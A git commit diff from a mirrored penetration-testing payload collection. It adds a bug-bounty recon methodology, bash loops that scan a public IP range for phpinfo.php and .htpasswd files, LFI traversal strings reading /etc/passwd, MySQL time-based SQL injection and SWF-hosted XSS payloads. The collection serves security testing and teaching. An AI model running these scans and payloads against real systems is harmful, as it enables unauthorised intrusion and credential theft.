mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 10:56:10 +00:00
Methodology added, XSS payloads updated,little fix
This commit is contained in:
parent
22e8dc091f
commit
54bf6d9a5b
1
.gitignore
vendored
Normal file
1
.gitignore
vendored
Normal file
@ -0,0 +1 @@
|
||||
Low_hanging_fruits.md
|
@ -1,29 +0,0 @@
|
||||
# Collection of usefull scripts and tricks
|
||||
|
||||
## Dorks
|
||||
|
||||
Google Dork to find subdomains
|
||||
```
|
||||
site:*.domain.com -www
|
||||
site:http://domain.com ext:php
|
||||
site:http://domain.com filtype:pdf
|
||||
```
|
||||
|
||||
## Scripts
|
||||
Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
|
||||
```
|
||||
#!/bin/bash
|
||||
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
|
||||
```
|
||||
|
||||
Script to detect all .htpasswd files in a range of IPs
|
||||
```
|
||||
#!/bin/bash
|
||||
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
|
117
Methodology_and_enumeration.md
Normal file
117
Methodology_and_enumeration.md
Normal file
@ -0,0 +1,117 @@
|
||||
# Methodology and Enumeration
|
||||
|
||||
## Bug Hunting Methodology
|
||||
1. Enumerate all subdomains (only if the scope is *.domain.ext)
|
||||
Using KnockPy with Daniel Miessler’s SecLists for subdomain "/Discover/DNS"
|
||||
```
|
||||
git clone https://github.com/guelfoweb/knock
|
||||
git clone https://github.com/danielmiessler/SecLists.git
|
||||
|
||||
knockpy domain.com -w /PATH_TO_SECLISTS/Discover/DNS/subdomains-top1mil-110000.txt
|
||||
```
|
||||
|
||||
Using Jason Haddix's enumall Recon-ng script,
|
||||
```
|
||||
git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
|
||||
cd recon-ng
|
||||
pip install -r REQUIREMENTS
|
||||
ln -s /$recon-ng_path /usr/share/recon-ng
|
||||
git clone https://github.com/jhaddix/domain.git
|
||||
cd domain
|
||||
./setup_enumall.sh
|
||||
|
||||
./enumall.py domain.com
|
||||
-w to run a custom wordlist with recon-ng
|
||||
-a to use alt-dns
|
||||
-p to feed a custom permutations list to alt-dns (requires -a flag)
|
||||
-i to feed a list of domains (can also type extra domains into the original command)
|
||||
```
|
||||
|
||||
2. Subdomain take over using HostileSubBruteForcer
|
||||
```
|
||||
git clone https://github.com/nahamsec/HostileSubBruteforcer
|
||||
chmox +x sub_brute.rb
|
||||
./sub_brute.rb
|
||||
```
|
||||
|
||||
3. EyeWitness and Nmap scans from the KnockPy and enumall scans
|
||||
```
|
||||
git clone https://github.com/ChrisTruncer/EyeWitness.git
|
||||
./setup/setup.sh
|
||||
./EyeWitness.py -f filename -t optionaltimeout --open (Optional)
|
||||
./EyeWitness -f urls.txt --web
|
||||
./EyeWitness -x urls.xml -t 8 --headless
|
||||
./EyeWitness -f rdp.txt --rdp
|
||||
```
|
||||
|
||||
4. Basic NMAP (if allowed ^^')
|
||||
```
|
||||
sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 &
|
||||
sudo nmap -sSV -oA OUTPUTFILE -T4 -iL IPS.csv
|
||||
|
||||
• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
|
||||
|
||||
• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
|
||||
|
||||
• 192.168.0.1 is the IP address to scan
|
||||
|
||||
• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
|
||||
|
||||
• -T4 defines the timing for the task (options are 0-5 and higher is faster)
|
||||
```
|
||||
|
||||
5. List all the subdirectories with DirBuster or GoBuster
|
||||
```
|
||||
./gobuster -u http://buffered.io/ -w words.txt -t 10
|
||||
-u url
|
||||
-w wordlist
|
||||
-t threads
|
||||
|
||||
More subdomain :
|
||||
./gobuster -m dns -w subdomains.txt -u google.com -i
|
||||
```
|
||||
|
||||
6. Explore the website
|
||||
```
|
||||
- Start ZAP proxy, visit the main target site and perform a Forced Browse to discover files and directories
|
||||
- Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
|
||||
- Explore and understand available functionality, noting areas that correspond to vulnerability types
|
||||
```
|
||||
|
||||
7. Look for private information in GitHub repos with GitRob
|
||||
```
|
||||
gitrob commd
|
||||
```
|
||||
|
||||
8. Subscribe to the site and pay for the additional functionality to test
|
||||
|
||||
9. Launch a Nikto scan in case you missed something
|
||||
|
||||
|
||||
## Google Dorks
|
||||
|
||||
Google Dork to find subdomains
|
||||
```
|
||||
site:*.domain.com -www
|
||||
site:http://domain.com ext:php
|
||||
site:http://domain.com filetype:pdf
|
||||
```
|
||||
|
||||
## Scripts
|
||||
Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
|
||||
```
|
||||
#!/bin/bash
|
||||
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
|
||||
```
|
||||
|
||||
Script to detect all .htpasswd files in a range of IPs
|
||||
```
|
||||
#!/bin/bash
|
||||
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
|
@ -3,12 +3,13 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic LFI (null byte and double encoding)
|
||||
Basic LFI (null byte, double encoding and other tricks)
|
||||
```
|
||||
http://example.com/index.php?page=etc/passwd
|
||||
http://example.com/index.php?page=etc/passwd%00
|
||||
http://example.com/index.php?page=../../etc/passwd
|
||||
http://example.com/index.php?page=%252e%252e%252f
|
||||
http://example.com/index.php?page=....//....//etc/passwd
|
||||
```
|
||||
|
||||
LFI Wrapper rot13 and base64 - php://filter case insensitive
|
||||
|
@ -22,6 +22,7 @@ Last modifications :
|
||||
* [Eyewitness](https://github.com/ChrisTruncer/EyeWitness)
|
||||
* [Nikto](https://cirt.net/nikto2)
|
||||
* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
|
||||
* [Wappalyzer](https://wappalyzer.com/download)
|
||||
|
||||
# More resources
|
||||
Book's list:
|
||||
|
@ -76,6 +76,7 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||
MySQL Time Based
|
||||
```
|
||||
+BENCHMARK(40000000,SHA1(1337))+
|
||||
'%2Bbenchmark(3200,SHA1(1))%2B'
|
||||
```
|
||||
|
||||
|
||||
@ -107,5 +108,21 @@ Polyglot injection (multicontext)
|
||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/
|
||||
## Thanks to - Other resources
|
||||
* MySQL:
|
||||
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
|
||||
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
|
||||
* MSQQL:
|
||||
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
|
||||
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||
* ORACLE:
|
||||
- [PentestMonkey's Oracle SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
|
||||
* POSTGRESQL:
|
||||
- [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
|
||||
* Others
|
||||
- [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
|
||||
- [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
|
||||
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
|
||||
- [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
|
||||
- [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
|
||||
- [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
|
@ -136,9 +136,18 @@ XSS in SVG (short)
|
||||
```
|
||||
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
|
||||
```
|
||||
|
||||
XSS in SWF
|
||||
```
|
||||
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
|
||||
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
|
||||
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
|
||||
```
|
||||
|
||||
more payloads in ./files
|
||||
|
||||
|
||||
|
||||
## XSS with Relative Path Overwrite - IE 8/9 and lower
|
||||
|
||||
You need these 3 components
|
||||
|
Before Width: | Height: | Size: 379 B After Width: | Height: | Size: 379 B |
BIN
XSS injection/files/SWF_XSS.swf
Normal file
BIN
XSS injection/files/SWF_XSS.swf
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user